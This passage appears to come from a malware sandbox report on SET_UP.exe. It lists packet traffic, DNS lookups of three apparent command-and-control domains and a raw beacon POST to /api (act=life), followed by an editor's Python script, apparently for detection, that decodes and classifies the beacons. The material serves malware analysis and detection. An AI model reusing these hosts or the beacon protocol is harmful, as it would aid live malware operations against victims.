                                                                                                                                                                                                Jan 5, 2025 18:02:36.126190901 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.126240015 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.126919985 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.126934052 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.126962900 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.126967907 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.127006054 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.127372026 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.127398014 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.127422094 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.127427101 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.127454042 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.127468109 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128376961 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128397942 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128433943 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128437996 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128473997 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128488064 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128508091 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128539085 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128556013 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128560066 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128591061 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.128608942 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.129393101 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.129412889 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.129442930 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.129447937 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.129477978 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.129484892 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.130121946 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.130136967 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.130177975 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.130184889 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.130218983 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.130925894 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.130943060 CET44349758104.21.37.128192.168.2.4
Jan 5, 2025 18:02:36.130984068 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.130990028 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.131028891 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.131522894 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.213115931 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.213135004 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.213174105 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.213186026 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.213197947 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.213223934 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.213754892 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.213769913 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.213807106 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.213812113 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.213845015 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.213856936 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.214513063 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.214534044 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.214565992 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.214571953 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.214584112 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.214608908 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.214978933 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.214994907 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.215029955 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.215034008 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.215065002 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.215075970 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.215738058 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.215759039 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.215796947 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.215801001 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.215823889 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.215837002 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.215909004 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.215926886 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.215990067 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.215996027 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.216042995 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.216768026 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.216784000 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.216816902 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.216823101 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.216851950 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.216871023 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.217679977 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.217700005 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.217721939 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.217726946 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.217755079 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.217770100 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.219331980 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.300210953 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.300244093 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.300316095 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.300335884 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.300384998 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.300661087 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.300683022 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.300714970 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.300720930 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.300750971 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.300765038 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.301455975 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.301474094 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.301517010 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.301522017 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.301546097 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.301564932 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.302273035 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.302289963 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.302347898 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.302352905 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.302402020 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.302402973 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.302427053 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.302457094 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.302475929 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.302475929 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.302484989 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.302532911 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.303320885 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.303335905 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.303378105 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.303383112 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.303395033 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.303428888 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.303880930 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.304151058 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.304167032 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.304223061 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.304228067 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.304269075 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.304858923 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.304876089 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.304925919 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.304932117 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.304972887 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.313200951 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.387634039 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.387656927 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.387732983 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.387747049 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.387758017 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.387773037 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.387783051 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.387787104 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.387794971 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.387819052 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.387851000 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.388145924 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.388161898 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.388200998 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.388206959 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.388216972 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.388247013 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.388686895 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.388706923 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.388736963 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.388741016 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.388752937 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.388767958 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.388792038 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.389653921 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.389672041 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.389736891 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.389744043 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.390256882 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.390279055 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.390305996 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.390311003 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.390330076 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.391177893 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.391197920 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.391242981 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.391248941 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.391273022 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.392976046 CET  49758  443    192.168.2.4    104.21.37.128
Jan 5, 2025 18:02:36.435825109 CET  443    49758  104.21.37.128  192.168.2.4
Jan 5, 2025 18:02:36.435853958 CET  443    49758  104.21.37.128  192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.435970068 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.435992002 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.436007977 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.475564003 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.475590944 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.475687027 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.475694895 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476185083 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476203918 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476268053 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476274967 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476720095 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476747036 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476787090 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476793051 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.476826906 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.477243900 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.477257967 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.477319956 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.477327108 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478111982 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478143930 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478163004 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478167057 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478225946 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478878021 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478893042 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478930950 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478936911 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.478976011 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.479115009 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.479130983 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.479176044 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.479182005 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.481013060 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.523561001 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.523585081 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.523698092 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.523705959 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562794924 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562820911 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562886953 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562895060 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.562928915 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563126087 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563153028 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563190937 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563196898 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563221931 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563913107 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563935041 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563970089 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.563975096 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.564003944 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.564023972 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.564028025 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.564073086 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.575357914 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.575376034 CET44349758104.21.37.128192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:36.575391054 CET49758443192.168.2.4104.21.37.128
                                                                                                                                                                                                Jan 5, 2025 18:02:36.575395107 CET44349758104.21.37.128192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2025 18:02:18.341510057 CET | 50467 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 18:02:18.355395079 CET | 53 | 50467 | 1.1.1.1 | 192.168.2.4
Jan 5, 2025 18:02:28.773715973 CET | 53914 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 18:02:28.878102064 CET | 53 | 53914 | 1.1.1.1 | 192.168.2.4
Jan 5, 2025 18:02:29.809875011 CET | 59589 | 53 | 192.168.2.4 | 1.1.1.1
Jan 5, 2025 18:02:29.822504997 CET | 53 | 59589 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 5, 2025 18:02:18.341510057 CET | 192.168.2.4 | 1.1.1.1 | 0xbc95 | Standard query (0) | cutefingeuker.click | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:02:28.773715973 CET | 192.168.2.4 | 1.1.1.1 | 0xc25b | Standard query (0) | cegu.shop | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:02:29.809875011 CET | 192.168.2.4 | 1.1.1.1 | 0x1245 | Standard query (0) | klipvumisui.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 5, 2025 18:02:18.355395079 CET | 1.1.1.1 | 192.168.2.4 | 0xbc95 | No error (0) | cutefingeuker.click | (none) | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:02:18.355395079 CET | 1.1.1.1 | 192.168.2.4 | 0xbc95 | No error (0) | cutefingeuker.click | (none) | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:02:28.878102064 CET | 1.1.1.1 | 192.168.2.4 | 0xc25b | No error (0) | cegu.shop | (none) | 185.161.251.21 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:02:29.822504997 CET | 1.1.1.1 | 192.168.2.4 | 0x1245 | No error (0) | klipvumisui.shop | (none) | 104.21.37.128 | A (IP address) | IN (0x0001) | false
Jan 5, 2025 18:02:29.822504997 CET | 1.1.1.1 | 192.168.2.4 | 0x1245 | No error (0) | klipvumisui.shop | (none) | 172.67.208.58 | A (IP address) | IN (0x0001) | false
• cutefingeuker.click
• cegu.shop
• klipvumisui.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | 7480 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:02:18 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cutefingeuker.click
2025-01-05 17:02:18 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-05 17:02:19 UTC | 1129 | IN | HTTP/1.1 200 OK
Date: Sun, 05 Jan 2025 17:02:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=l7dk6ur4a455net1gm8p1eceh7; expires=Thu, 01 May 2025 10:48:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MER0NFeSXcY9KdogYZYdVBwpw6I%2FJtJy66rGfgWlN8%2BGsit5WulYEvXMxn9O49HYhFoy%2FUu6dMuC2dnlhm8D7aXQquLBL%2BgTJLRoviR9GxaxkneqeNgnPcJ5DLWg6ibGZwXHS%2BCV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd509085df343bc-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1567&rtt_var=607&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=910&delivery_rate=1863433&cwnd=221&unsent_bytes=0&cid=f73f6135c7169bd5&ts=763&x=0"
2025-01-05 17:02:19 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-05 17:02:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
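The two /api sessions in this report show the beacon shape a detection engineer would key on: a POST to /api with a browser User-Agent sent by SET_UP.exe, a first body of act=life answered with a chunked "ok", then a second body carrying act=recive_message with ver, lid and j fields, all to a host that sits behind Cloudflare (Server: cloudflare, CF-RAY). The script below is an added example by the editor, not code from Joe Sandbox or from the sample. Its inputs are constructed from the report: the request bytes are the "Data Raw" hex strings as printed, the reply is the two chunks of session 0 joined, and DNS_ANSWERS copies the DNS answer table. The classification rule (which fields must be present, that j= is a 32-character lowercase hex token, and that only the two act= values seen here count) is an assumption drawn from these sessions alone, not a vendor signature, and the dst_ip/host pairing is taken from the session table and Host header rather than from a parsed PCAP.

```python
"""Decode and classify the C2 HTTP exchanges listed in this report.

Added example by the editor; not code from the report, from Joe Sandbox or
from the sample. Inputs are constructed from what the report prints.
The detection rule below is an assumption based only on these two sessions.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

# Constructed from the report: sessions 0 and 1, both to cutefingeuker.click.
SESSIONS = [
    {
        "host": "cutefingeuker.click", "dst_ip": "188.114.96.3",
        "method": "POST", "path": "/api", "user_agent": UA, "content_length": 8,
        "body_hex": "61 63 74 3d 6c 69 66 65",
        # Both reply chunks joined: "2\r\nok\r\n" followed by "0\r\n\r\n".
        "reply_hex": "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a",
    },
    {
        "host": "cutefingeuker.click", "dst_ip": "188.114.96.3",
        "method": "POST", "path": "/api", "user_agent": UA, "content_length": 80,
        "body_hex": (
            "61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 "
            "26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 "
            "62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64"
        ),
        "reply_hex": None,  # session 1's response is not part of the quoted excerpt
    },
]

# Constructed from the report's DNS answer table.
DNS_ANSWERS = {
    "cutefingeuker.click": {"188.114.96.3", "188.114.97.3"},
    "cegu.shop": {"185.161.251.21"},
    "klipvumisui.shop": {"104.21.37.128", "172.67.208.58"},
}

# act= values observed in this capture (assumption: only these count as C2 verbs).
C2_ACTIONS = {"life", "recive_message"}


def hex_to_bytes(hexdump: str) -> bytes:
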